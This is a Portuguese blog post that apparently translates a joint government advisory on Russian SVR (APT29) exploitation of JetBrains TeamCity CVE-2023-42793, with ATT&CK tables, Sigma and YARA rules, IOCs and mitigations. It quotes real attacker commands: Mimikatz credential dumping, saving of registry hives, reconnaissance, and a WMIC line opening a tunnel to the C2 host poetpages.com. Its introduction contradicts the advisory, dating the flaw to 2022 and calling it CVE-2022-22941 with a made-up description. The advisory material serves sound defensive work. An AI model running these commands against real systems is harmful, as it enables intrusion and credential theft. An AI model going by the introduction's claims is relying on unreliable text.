blank

blank

O Serviço Russo de Inteligência Estrangeira (SVR), também conhecidos como Advanced Persistent Threat 29 (APT 29), Dukes, CozyBear e NOBELIUM/Midnight Blizzard – estão explorando CVE-2023-42793, uma ferramenta de integração contínua e entrega contínua (CI/CD). A vulnerabilidade, que foi relatada pela primeira vez em 2022, permite que os atacantes executem código arbitrário nos sistemas afetados.

A CISA (Agência de Segurança Cibernética e Infraestrutura dos EUA) emitiu um alerta de segurança em 13 de dezembro de 2023, alertando as organizações sobre a exploração da vulnerabilidade pelo SVR. O alerta recomenda que as organizações que usam o JetBrains TeamCity apliquem o patch de segurança o mais rápido possível.

ADVERSÁRIO: Diplomatic Orbiter
INDÚSTRIAS: Governo, Político, Diplomático, Tecnologia da Informação, Tecnologia
PAÍS ALVO: Estados Unidos da América
FAMÍLIAS DE MALWARE: GraphicalProtonSVR Cyber
ATT&CK IDS: T1003 – Despejo de credenciais do sistema operacional, T1020 – Exfiltração Automatizada, T1027 – Arquivos ou informações ofuscadas, T1033 – Descoberta de proprietário/usuário do sistema, T1036 – Mascaramento, T1041 – Exfiltração pelo Canal C2, T1046 – Verificação de serviço de rede, T1047 – Instrumentação de gerenciamento do Windows, T1049 – Descoberta de conexões de rede do sistema, T1053 – Tarefa/Trabalho Agendado, T1055 – Injeção de Processo, T1057 – Descoberta de Processo, T1059 – Interpretador de Comandos e Scripts, T1068 – Exploração para escalonamento de privilégios, T1098 – Manipulação de Conta, T1190 – Explorar aplicativo voltado ao público, T1203 – Exploração para Execução do Cliente, T1210 – Exploração de Serviços Remotos, T1505 – Componente de software de servidor, T1547 – Execução de inicialização automática de inicialização ou logon, T1555 – Credenciais de armazenamentos de senhas, T1558 – Roubar ou falsificar ingressos Kerberos, T1562 – Prejudicar Defesas, T1564 – Ocultar artefatos, T1567 – Exfiltração por serviço da Web, T1568 – Resolução Dinâmica, T1572 – Tunelamento de protocolo, T1574 – Fluxo de execução de sequestro, T1590 – Coletar informações da rede da vítima, T1592 – Coletar informações do anfitrião da vítima, T1531 – Remoção de acesso à conta, T1140 – Desofuscar/Decodificar Arquivos ou Informações, T1550 – Usar material de autenticação alternativo, T1195 – Compromisso da Cadeia de Fornecimento, T1102 – Serviço Web

 

O JetBrains TeamCity é uma ferramenta de CI/CD popular usada por organizações em todo o mundo. A ferramenta permite que as organizações automatizem o processo de desenvolvimento, construção e teste de software.

Em 2022, a JetBrains publicou um aviso de segurança sobre uma vulnerabilidade crítica no JetBrains TeamCity. A vulnerabilidade, identificada como CVE-2022-22941, permite que os atacantes executem código arbitrário nos sistemas afetados.

Descrição da Vulnerabilidade

A vulnerabilidade está presente na funcionalidade de gerenciamento de usuários do JetBrains TeamCity. A vulnerabilidade permite que os atacantes injetem código malicioso em um arquivo de configuração do TeamCity.

Quando o arquivo de configuração é carregado pelo TeamCity, o código malicioso é executado no sistema afetado. O código malicioso pode ser usado para:

  • Obter acesso administrativo ao sistema
  • Instalar malware
  • Roubar dados
  • Causar danos ao sistema

Impacto dos Ataques

A CISA acredita que o SVR está explorando a vulnerabilidade do JetBrains TeamCity para atacar organizações em todo o mundo. A agência não divulgou detalhes sobre os ataques, mas disse que os atacantes estão mirando organizações em setores críticos, como defesa, governo e infraestrutura crítica.

Recomendações de Segurança do IDCiber.org

O IDCIber recomenda que as organizações que usam o JetBrains TeamCity apliquem o patch de segurança o mais rápido possível. O patch está disponível no site da JetBrains.

Além de aplicar o patch de segurança, as organizações também devem tomar as seguintes medidas para se protegerem de ataques:

  • Mantenha seu software antivírus atualizado.
  • Seja cauteloso ao abrir documentos de isca.
  • Não clique em links de fontes desconhecidas.
  • Educar seus funcionários sobre segurança cibernética.

Os APT29, Dukes, CozyBear e NOBELIUM/Midnight Blizzard são grupos de hackers patrocinados por estados que estão ativos há muitos anos e são conhecidos por seus ataques sofisticados a organizações em todo o mundo. Esses grupos são particularmente eficazes porque são capazes de se adaptar rapidamente às mudanças nas defesas cibernéticas.

Embora não haja uma solução única para se proteger contra esses grupos, existem uma série de medidas de segurança que as organizações podem implementar para reduzir o risco de serem atacadas.

1. Implemente uma postura de segurança cibernética sólida

A base de qualquer defesa cibernética eficaz é uma postura de segurança sólida. Isso inclui medidas como:

  • Atualize seu software e patches de segurança com frequência
  • Use firewalls e outros dispositivos de segurança de rede
  • Implemente autenticação multifator (MFA)
  • Educar seus funcionários sobre segurança cibernética

2. Seja proativo na detecção e resposta a ameaças

Além de implementar uma postura de segurança sólida, as organizações também devem ser proativas na detecção e resposta a ameaças. Isso inclui medidas como:

  • Monitoramento contínuo de seus sistemas para atividades suspeitas
  • Uso de ferramentas de detecção e resposta a incidentes (SIEM e SOAR)
  • Ter um plano de resposta a incidentes em vigor

3. Implemente proteção contra ataques de phishing e malware

Os ataques de phishing e malware são duas das técnicas mais comuns usadas pelos grupos de APT. As organizações podem se proteger contra esses ataques implementando medidas como:

  • Uso de filtros de spam e antivírus
  • Educar seus funcionários sobre como identificar e evitar ataques de phishing
  • Uso de soluções de segurança de e-mail abrangentes

4. Proteja suas informações confidenciais

As informações confidenciais, como dados financeiros ou de propriedade intelectual, são um alvo principal para os grupos de APT. As organizações podem proteger essas informações implementando medidas como:

  • Uso de criptografia
  • Implementação de políticas de controle de acesso
  • Revisão periódica de seus processos de segurança

 

Recomendações de Segurança da CISA

TÁTICAS E TÉCNICAS DE MITRE ATT&CK

Veja as tabelas abaixo para todas as táticas e técnicas dos agentes de ameaças referenciadas neste comunicado. Para mitigações adicionais, consulte a seção Mitigações.

Tabela 1: Técnicas ATT&CK de atores cibernéticos SVR para empresas – reconhecimento
Título da Técnica EU IA Usar
Reúna informações da rede da vítima: topologia da rede T1590.004 Os ciberatores do SVR podem coletar informações sobre a topologia de rede da vítima que podem ser usadas durante o direcionamento.
Reúna informações do anfitrião da vítima: software T1592.002 Os ciberatores do SVR podem coletar informações sobre as redes hospedeiras da vítima que podem ser usadas durante a segmentação.
Tabela 2: Técnicas ATT&CK dos SVR Cyber ​​Actors para Empresas – Acesso Inicial
Título da Técnica EU IA Usar
Explorar aplicativos voltados ao público T1190 Os ciberatores SVR exploram o servidor JetBrains TeamCity conectado à Internet usando CVE-2023-42793 para acesso inicial.
Tabela 3: Técnicas ATT&CK dos SVR Cyber ​​Actors para Empresas: Execução
Título da Técnica EU IA Usar
Intérprete de comandos e scripts: PowerShell T1059.001 Os ciberatores do SVR usaram comandos do PowerShell para compactar arquivos .dll do servidor Microsoft SQL.
Intérprete de comandos e scripts: Windows Command Shell T1059.003 Os ciberatores SVR executam estes comandos do PowerShell para realizar o reconhecimento do host:

  • powershell ([adsisearcher]”((samaccountname=<redacted>))”).Findall().Properties
  • powershell ([adsisearcher]”((samaccountname=<redacted>))”).Findall().Properties.memberof
  • powershell Get-WmiObject -Class Win32_Service -Computername
  • powershell Get-WindowsDriver -Online -All
Exploração para execução do cliente T1203 Os ciberatores SVR aproveitam a execução arbitrária de código após explorar CVE-2023-42793.
Fluxo de execução de hijack: carregamento lateral de DLL T1574.002 Os ciberatores SVR usam uma variante do GraphicalProton que usa o sequestro de DLL no Zabbix como meio de iniciar a execução.
Tabela 4: Técnicas ATT&CK dos SVR Cyber ​​Actors para Empresas: Persistência
Título da Técnica EU IA Usar
Tarefa agendada T1053.005 Os ciberatores do SVR podem abusar do Agendamento de Tarefas do Windows para realizar o agendamento de tarefas para execução inicial ou recorrente de código malicioso.
Componente de software de servidor: procedimentos armazenados SQL T1505.001 Os ciberatores SVR abusam dos procedimentos armazenados do SQL Server para manter a persistência.
Execução de inicialização automática de inicialização ou logon T1547 Os ciberatores do SVR usaram C:\Windows\system32\ntoskrnl.exe para definir as configurações de inicialização automática do sistema para manter a persistência.
Tabela 5: Técnicas ATT&CK dos atores cibernéticos SVR para empresas: escalonamento de privilégios
Título da Técnica EU IA Usar
Exploração para escalonamento de privilégios T1068 Os ciberatores SVR exploram a vulnerabilidade do JetBrains TeamCity para obter privilégios escalonados.

Para evitar a detecção, os ciberatores do SVR usaram a técnica “Traga seu próprio driver vulnerável” para desativar os mecanismos de defesa EDR e AV.
Manipulação de conta T1098 Os ciberatores do SVR podem manipular contas para manter e/ou elevar o acesso aos sistemas das vítimas.
Tabela 6: Técnicas ATT&CK dos atores cibernéticos SVR para empresas: evasão de defesa
Título da Técnica EU IA Usar
Arquivos ou informações ofuscadas: preenchimento binário T1027.001 Os ciberatores SVR usam BMPs para realizar preenchimento binário enquanto os dados de troca são exfiltrados para sua estação C2.
Mascaramento T1036 Os ciberatores SVR usam uma variante que usa o sequestro de DLL no Zabbix como um meio de iniciar a execução (e potencialmente fornecer acesso de longo prazo e difícil de detectar) e uma variante que se mascara dentro do vcperf, uma ferramenta de análise de construção C++ de código aberto da Microsoft.
Injeção de Processo T1055 Os ciberatores SVR injetam código nos processos AV e EDR para escapar das defesas.
Desabilitar ou modificar ferramentas T1562.001 Os ciberatores do SVR podem modificar e/ou desabilitar ferramentas para evitar a possível detecção de seus malwares/ferramentas e atividades.
Ocultar artefatos T1564 Os ciberatores do SVR podem tentar ocultar artefatos associados aos seus comportamentos para evitar a detecção.
Ocultar artefatos: arquivos e diretórios ocultos T1564.001 Ao se comunicar com serviços em nuvem, o GraphicalProton gera um diretório nomeado aleatoriamente que é usado para armazenar arquivos BMP específicos de infecções – com comandos e resultados.
Tabela 7: Técnicas ATT&CK dos atores cibernéticos de SVR para empresas: acesso a credenciais
Título da Técnica EU IA Usar
Despejo de credenciais do sistema operacional: memória LSASS T1003.001 Os ciberatores do SVR executaram comandos Mimikatz na memória para obter acesso às credenciais armazenadas na memória.
Despejo de credenciais do sistema operacional: gerente de contas de segurança T1003.002 Atores cibernéticos SVR usaram:

  • privilege::debug
  • lsadump::cache
  • lsadump::secrets
  • lsadump::sam

Comandos Mimikatz para obter acesso às credenciais.

Além disso, os ciberatores do SVR exfiltraram seções do registro do Windows para roubar credenciais.

  • HKLM\SYSTEM
  • HKLM\SAM
  • HKLM\SECURITY
Credenciais de armazenamentos de senhas: credenciais de navegadores da Web T1555.003 Em alguns casos específicos, o SVR usou a ferramenta SharpChromium para obter dados confidenciais do navegador, como cookies de sessão, histórico de navegação ou logins salvos.
Roubar ou falsificar ingressos Kerberos: Bilhete Dourado T1558.001 Para garantir o acesso de longo prazo ao meio ambiente, o SVR usou o kit de ferramentas Rubeus para criar Ticket Granting Tickets (TGTs).
Tabela 8: Técnicas ATT&CK de atores cibernéticos de SVR para empresas: descoberta
Título da Técnica EU IA Usar
Proprietário do sistema/descoberta de usuário T1033 Os ciberatores SVR usam estes comandos integrados para realizar o reconhecimento de host: whoami /priv, whoami /all, whoami / groups, whoami /domain para realizar a descoberta do usuário.
Descoberta de serviço de rede T1046 Os ciberatores SVR realizaram reconhecimento de rede usando uma combinação de comandos integrados e ferramentas adicionais, como scanner de porta e PowerSploit.
Descoberta de processos T1057 Os ciberatores SVR usam GraphicalProton para coletar dados de processos em execução.
Reúna informações da rede de vítimas T1590 Os ciberatores SVR usam GraphicalProton para coletar informações da rede das vítimas.
Tabela 9: Técnicas ATT&CK de atores cibernéticos de SVR para empresas: movimento lateral
Título da Técnica EU IA Usar
Exploração de serviços remotos T1210 Os ciberatores do SVR podem explorar serviços remotos para obter acesso não autorizado a sistemas internos, uma vez dentro de uma rede.
Instrumentação de gerenciamento do Windows T1047 Os ciberatores do SVR executaram o Rsockstun na memória ou usando o Windows Management Instrumentation (WMI) para executar comandos e cargas maliciosas.

wmic process call create “C:\Arquivos de programas\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31”
Tabela 10: Técnicas ATT&CK de atores cibernéticos SVR para empresas: comando e controle
Título da Técnica EU IA Usar
Resolução Dinâmica T1568 O SVR pode estabelecer conexões dinamicamente com a infraestrutura de comando e controle para evitar detecções e correções comuns.
Tunelamento de protocolo T1572 Os atores cibernéticos do SVR podem encapsular as comunicações de rede de e para o sistema da vítima dentro de um protocolo separado para evitar a detecção/filtragem da rede e/ou permitir o acesso a sistemas que de outra forma seriam inacessíveis.

Em ambientes selecionados, o SVR usou uma ferramenta adicional chamada “rr.exe” – um túnel de meias reversas de código aberto modificado chamado Rsockstunm – para estabelecer um túnel para a infraestrutura C2.
Tabela 11: Técnicas ATT&CK de atores cibernéticos de SVR para empresas: exfiltração
Título da Técnica EU IA Usar
Exfiltração Automatizada T1020 Os ciberatores do SVR podem exfiltrar dados, como documentos confidenciais, por meio do uso de processamento automatizado após serem coletados durante a coleta.
Exfiltração pelo canal C2 T1041 Os ciberatores SVR podem roubar dados exfiltrando-os através de um canal C2 existente. Os dados roubados são codificados nas comunicações normais usando o mesmo protocolo das comunicações C2.
Exfiltração por serviço da Web T1567 Os ciberatores SVR usam OneDrive e Dropbox para exfiltrar dados para sua estação C2.

INDICADORES DE COMPROMISSO

Nota: Consulte o Apêndice B para obter uma lista de IOCs.

TIPOS DE VÍTIMAS

Como resultado desta última atividade cibernética do SVR, o FBI, CISA, NSA, SKW, CERT Polska e NCSC identificaram algumas dezenas de empresas comprometidas nos Estados Unidos, Europa, Ásia e Austrália, e estão cientes de mais de cem dispositivos comprometidos, embora avaliemos, esta lista não representa o conjunto completo de organizações comprometidas. Geralmente, os tipos de vítimas não se enquadram em nenhum tipo de padrão ou tendência, além de terem um servidor JetBrains TeamCity acessível pela Internet, sem patch, levando à avaliação de que a exploração das redes dessas vítimas pelo SVR era de natureza oportunista e não necessariamente direcionada. ataque. As vítimas identificadas incluíram: uma associação comercial de energia; empresas que fornecem software para cobrança, dispositivos médicos, atendimento ao cliente, monitoramento de funcionários, gestão financeira, marketing, vendas e videogames; bem como empresas de hospedagem, fabricantes de ferramentas e pequenas e grandes empresas de TI.

MÉTODOS DE DETECÇÃO

As regras a seguir podem ser usadas para detectar atividades vinculadas à atividade adversária. Estas regras devem servir de exemplo e adaptar-se ao ambiente e à telemetria de cada organização.

Regras SIGMA

title: Privilege information listing via whoami
description: Detects whoami.exe execution and listing of privileges
author:
references: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'whoami.exe'
CommandLine|contains:
- 'priv'
- 'PRIV'
condition: selection
falsepositives: legitimate use by system administratortitle: DC listing via nltest
description: Detects nltest.exe execution and DC listing
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'nltest.exe'
CommandLine|re: '.*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'
condition: selection
falsepositives: legitimate use by system administratortitle: DLL execution via WMI
description: Detects DLL execution via WMI
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'WMIC.exe'
CommandLine|contains|all:
- 'call'
- 'rundll32'
condition: selection
falsepositives: legitimate use by software or system administratortitle: Process with connect and pass as args
description: Process with connect and pass as args
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'pass'
- 'connect'
condition: selection
falsepositives: legitimate use of rsockstun or software with exact same argumentstitle: Service or Drive enumeration via powershell
description: Service or Drive enumeration via powershell
author:
references:
date: 2023/11/15
logsource:
category: ps_script
product: windows
detection:
selection_1:
ScriptBlockText|contains|all:
- 'Get-WmiObject'
- '-Class'
- 'Win32_Service'
selection_2:
ScriptBlockText|contains|all:
- 'Get-WindowsDriver'
- '-Online'
- '-All'
condition: selection_1 or selection_2
falsepositives: legitimate use by system administrator

title: Compressing files from temp to temp
description: Compressing files from temp\ to temp used by SVR to prepare data to be exfiltrated
references:
author:
date: 2023/11/15
logsource:
category: ps_script
product: windows
detection:
selection:
ScriptBlockText|re: '.*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*'
condition: selection

title: DLL names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific DLL names.
references:
author:
date: 2023/11/15
logsource:
category: image_load
product: windows
detection:
selection:
ImageLoaded|endswith:
- 'AclNumsInvertHost.dll'
- 'ModeBitmapNumericAnimate.dll'
- 'UnregisterAncestorAppendAuto.dll'
- 'DeregisterSeekUsers.dll'
- 'ScrollbarHandleGet.dll'
- 'PerformanceCaptionApi.dll'
- 'WowIcmpRemoveReg.dll'
- 'BlendMonitorStringBuild.dll'
- 'HandleFrequencyAll.dll'
- 'HardSwapColor.dll'
- 'LengthInMemoryActivate.dll'
- 'ParametersNamesPopup.dll'
- 'ModeFolderSignMove.dll'
- 'ChildPaletteConnected.dll'
- 'AddressResourcesSpec.dll'
condition: selection

title: Sensitive registry entries saved to file
description: Sensitive registry entries saved to file
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection_base:
Image|endswith:
- 'reg.exe'
CommandLine|contains: 'save'
CommandLine|re: '.*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*'
selection_file:
CommandLine|re: '.*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'
condition: selection_base and selection_file

title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
category: taskscheduler
product: windows
detection:
selection:
EventID:
- 4698
- 4699
- 4702
TaskName:
- '\Microsoft\Windows\IISUpdateService'
- '\Microsoft\Windows\WindowsDefenderService'
- '\Microsoft\Windows\WindowsDefenderService2'
- '\Microsoft\DefenderService'
- '\Microsoft\Windows\DefenderUPDService'
- '\Microsoft\Windows\WiMSDFS'
- '\Microsoft\Windows\Application Experience\StartupAppTaskCkeck'
- '\Microsoft\Windows\Windows Error Reporting\SubmitReporting'
- '\Microsoft\Windows\Windows Defender\Defender Update Service'
- '\WindowUpdate'
- '\Microsoft\Windows\Windows Error Reporting\CheckReporting'
- '\Microsoft\Windows\Application Experience\StartupAppTaskCheck'
- '\Microsoft\Windows\Speech\SpeechModelInstallTask'
- '\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart'
- '\Microsoft\Windows\Data Integrity Scan\Data Integrity Update'
- '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
- '\Microsoft\Windows\ATPUpd'
- '\Microsoft\Windows\Windows Defender\Service Update'
- '\Microsoft\Windows\WindowsUpdate\Scheduled Check'
- '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
- '\Defender'
- '\defender'
- '\\Microsoft\\Windows\\IISUpdateService'
- '\\Microsoft\\Windows\\WindowsDefenderService'
- '\\Microsoft\\Windows\\WindowsDefenderService2'
- '\\Microsoft\\DefenderService'
- '\\Microsoft\\Windows\\DefenderUPDService'
- '\\Microsoft\\Windows\\WiMSDFS'
- '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'
- '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'
- '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'
- '\\WindowUpdate'
- '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'
- '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'
- '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'
- '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'
- '\\Microsoft\\Windows\\Data Integrity Scan\Data Integrity Update'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
- '\\Microsoft\\Windows\\ATPUpd'
- '\\Microsoft\\Windows\\Windows Defender\\Service Update'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
- '\\Defender'
- '\\defender'
condition: selection

title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'schtasks.exe'
CommandLine|contains:
- 'IISUpdateService'
- 'WindowsDefenderService'
- 'WindowsDefenderService2'
- 'DefenderService'
- 'DefenderUPDService'
- 'WiMSDFS'
- 'StartupAppTaskCkeck'
- 'SubmitReporting'
- 'Defender Update Service'
- 'WindowUpdate'
- 'CheckReporting'
- 'StartupAppTaskCheck'
- 'SpeechModelInstallTask'
- 'BfeOnServiceStart'
- 'Data Integrity Update'
- 'Scheduled AutoCheck'
- 'ATPUpd'
- 'Service Update'
- 'Scheduled Check'
- 'Scheduled AutoCheck'
- 'Defender'
- 'defender'
selection_re:
Image|endswith:
- 'schtasks.exe'
CommandLine|re:
- '.*Defender\sUpdate\sService.*'
- '.*Data\sIntegrity\sUpdate.*'
- '.*Scheduled\sAutoCheck.*'
- '.*Service\sUpdate.*'
- '.*Scheduled\sCheck.*'
- '.*Scheduled\sAutoCheck.*'
condition: selection or selection_re

title: Suspicious registry modifications
description: Suspicious registry modifications
author:
references:
date: 2023/11/15
logsource:
category: registry_set
product: windows
detection:
selection:
EventID: 4657
TargetObject|contains:
- 'CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'
- 'CurrentControlSet\\Control\\Lsa\\NoLMHash'
condition: selection

title: Registry modification from cmd
description: Registry modification from cmd
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'reg.exe'
CommandLine|contains|all:
- 'CurrentControlSet'
- 'Lsa'
CommandLine|contains:
- 'DisableRestrictedAdmin'
- 'NoLMHash'
condition: selection

title: Malicious Driver Load
description: Detects the load of known malicious drivers via their names or hash.
references:
- https://github.com/wavestone-cdt/EDRSandblast#edr-drivers-and-processes-detection
author:
date: 2023/11/15
logsource:
category: driver_load
product: windows
detection:
selection_name:
ImageLoaded|endswith:
- 'RTCore64.sys'
- 'DBUtils_2_3.sys'
selection_hash:
Hashes|contains:
- '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd'
- '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5'
condition: selection_name or selection_hash

Regras YARA

A regra a seguir detecta as variantes GraphicalProton mais conhecidas.

rule APT29_GraphicalProton {
strings:
// C1 E9 1B                                shr     ecx, 1Bh
// 48 8B 44 24 08                          mov     rax, [rsp+30h+var_28]
// 8B 50 04                                mov     edx, [rax+4]
// C1 E2 05                                shl     edx, 5
// 09 D1                                   or      ecx, edx
// 48 8B 44 24 08                          mov     rax, [rsp+30h+var_28]
$op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 | 08 | 10 | 0d | 07) 09 ?? 48 }        // 48 05 20 00 00 00                       add     rax, 20h ; ' '
// 48 89 C1                                mov     rcx, rax
// 48 8D 15 0A A6 0D 00                    lea     rdx, unk_14011E546
// 41 B8 30 00 00 00                       mov     r8d, 30h ; '0'
// E8 69 B5 FE FF                          call    sub_14002F4B0
// 48 8B 44 24 30                          mov     rax, [rsp+88h+var_58]
// 48 05 40 00 00 00                       add     rax, 40h ; '@'
// 48 89 C1                                mov     rcx, rax
// 48 8D 15 1B A6 0D 00                    lea     rdx, unk_14011E577
// 41 B8 70 01 00 00                       mov     r8d, 170h
// E8 49 B5 FE FF                          call    sub_14002F4B0
// 48 8B 44 24 30                          mov     rax, [rsp+88h+var_58]
// 48 05 60 00 00 00                       add     rax, 60h ; '`'
// 48 89 C1                                mov     rcx, rax
// 48 8D 15 6C A7 0D 00                    lea     rdx, unk_14011E6E8
// 41 B8 2F 00 00 00                       mov     r8d, 2Fh ; '/'
// E8 29 B5 FE FF                          call    sub_14002F4B0
// 48 8B 44 24 30                          mov     rax, [rsp+88h+var_58]
// 48 05 80 00 00 00                       add     rax, 80h
// 48 89 C1                                mov     rcx, rax
// 48 8D 15 7C A7 0D 00                    lea     rdx, unk_14011E718
// 41 B8 2F 00 00 00                       mov     r8d, 2Fh ; '/'
// E8 09 B5 FE FF                          call    sub_14002F4B0
// 48 8B 44 24 30                          mov     rax, [rsp+88h+var_58]
// 48 05 A0 00 00 00                       add     rax, 0A0h
$op_decrypt_config = {
48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 A0 00 00 00
}    condition:
all of them
}

 

Observação: essas regras destinam-se à caça de ameaças e não foram testadas em um conjunto de dados maior.

MITIGAÇÕES

O FBI, CISA, NSA, SKW, CERT Polska e NCSC avaliam o alcance e o direcionamento indiscriminado desta campanha representa uma ameaça à segurança pública e recomendam que as organizações implementem as mitigações abaixo para melhorar a postura de segurança cibernética da organização. Essas mitigações estão alinhadas com as Metas de Desempenho de Segurança Cibernética (CPGs) intersetoriais desenvolvidas pela CISA e pelo Instituto Nacional de Padrões e Tecnologia (NIST). Os CPGs fornecem um conjunto mínimo de práticas e proteções que a CISA e o NIST recomendam que todas as organizações implementem. A CISA e o NIST basearam os CPGs em estruturas e orientações de segurança cibernética existentes para proteção contra as ameaças, táticas, técnicas e procedimentos mais comuns e impactantes. Visite as Metas de desempenho de segurança cibernética intersetorial da CISA para obter mais informações sobre os CPGs, incluindo proteções básicas adicionais recomendadas.

  • Aplique os patches disponíveis para CVE-2023-42793 emitidos pela JetBrains TeamCity em meados de setembro de 2023, se ainda não tiver sido concluído.
  • Monitore a rede em busca de evidências de comandos codificados e execução de ferramentas de varredura de rede.
  • Certifique-se de que as soluções de monitoramento antivírus/endpoint baseadas em host estejam habilitadas e configuradas para alertar se o monitoramento ou a geração de relatórios forem desabilitados ou se a comunicação for perdida com um agente de host por mais do que um período de tempo razoável.
  • Exigir o uso de autenticação multifator [ CPG 1.3 ] para todos os serviços, na medida do possível, especialmente para e-mail, redes privadas virtuais e contas que acessam sistemas críticos.
    • As organizações devem adotar a autenticação multifator (MFA) como uma camada adicional de segurança para todos os usuários com acesso a dados confidenciais. A ativação da MFA reduz significativamente o risco de acesso não autorizado, mesmo que as senhas sejam comprometidas.
  • Mantenha todos os sistemas operacionais, software e firmware atualizados. Configure imediatamente sistemas recém-adicionados à rede, incluindo aqueles usados ​​para testes ou trabalhos de desenvolvimento, para seguir a linha de base de segurança da organização e incorporá-los às ferramentas de monitoramento corporativo.
  • Arquivos de log de auditoria para identificar tentativas de acesso a certificados privilegiados e criação de provedores de identidade falsos.
  • Implante software para identificar comportamentos suspeitos nos sistemas.
  • Implante sistemas de proteção de endpoint com a capacidade de monitorar indicadores comportamentais de comprometimento.
  • Use os recursos públicos disponíveis para identificar abuso de credenciais em ambientes de nuvem.
  • Configure mecanismos de autenticação para confirmar determinadas atividades do usuário nos sistemas, incluindo o registro de novos dispositivos.

VALIDAR CONTROLES DE SEGURANÇA

Além de aplicar mitigações, FBI, CISA, NSA, SKW, CERT Polska e NCSC recomendam exercitar, testar e validar o programa de segurança da sua organização contra os comportamentos de ameaça mapeados para a estrutura MITRE ATT&CK for Enterprise neste comunicado. FBI, CISA, NSA, SKW, CERT Polska e NCSC recomendam testar seu inventário de controles de segurança existente para avaliar seu desempenho em relação às técnicas ATT&CK descritas neste comunicado.

Para começar:

  1. Selecione uma técnica ATT&CK descrita neste comunicado (consulte as tabelas anteriores).
  2. Alinhe suas tecnologias de segurança com a técnica.
  3. Teste suas tecnologias em relação à técnica.
  4. Analise o desempenho das suas tecnologias de detecção e prevenção.
  5. Repita o processo para todas as tecnologias de segurança para obter um conjunto abrangente de dados de desempenho.
  6. Ajuste seu programa de segurança, incluindo pessoas, processos e tecnologias, com base nos dados gerados por esse processo.

FBI, CISA, NSA, SKW, CERT Polska e NCSC recomendam testar continuamente seu programa de segurança, em escala, em um ambiente de produção para garantir o desempenho ideal em relação às técnicas MITRE ATT&CK identificadas neste comunicado.

APÊNDICE A – INDICADORES DE COMPROMISSO CVE-2023-42793

Em um sistema Windows, o arquivo de log C:\TeamCity\logs\teamcity-server.logconterá uma mensagem de log quando um invasor modificar o internal.propertiesarquivo. Haverá também uma mensagem de log para cada processo criado por meio do /app/rest/debug/processesendpoint. Além de mostrar a linha de comando utilizada, também é mostrado o ID do usuário da conta do usuário cujo token de autenticação foi utilizado durante o ataque. Por exemplo:

[2023-09-26 11:53:46,970]   INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:46,970]   INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227]   INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"

Um invasor pode tentar encobrir seus rastros apagando esse arquivo de log. Não parece que o TeamCity registre solicitações HTTP individuais, mas se o TeamCity estiver configurado para ficar atrás de um proxy HTTP, o proxy HTTP pode ter logs adequados mostrando os seguintes endpoints de destino sendo acessados:

  • /app/rest/users/id:1/tokens/RPC2– Este endpoint é necessário para explorar a vulnerabilidade.
  • /app/rest/users– Este endpoint só é necessário se o invasor desejar criar um usuário arbitrário.
  • /app/rest/debug/processes– Este endpoint só é necessário se o invasor desejar criar um processo arbitrário.

Nota: O valor do ID do usuário pode ser superior a 1.

APÊNDICE B – IOCS

IoCs de arquivo

Backdoor GraphicProton:

  • 01B5F7094DE0B2C6F8E28AA9A2DED678C166D615530E595621E692A9C0240732
  • 34C8F155601A3948DDB0D60B582CFE87DE970D443CC0E05DF48B1A1AD2E42B5E
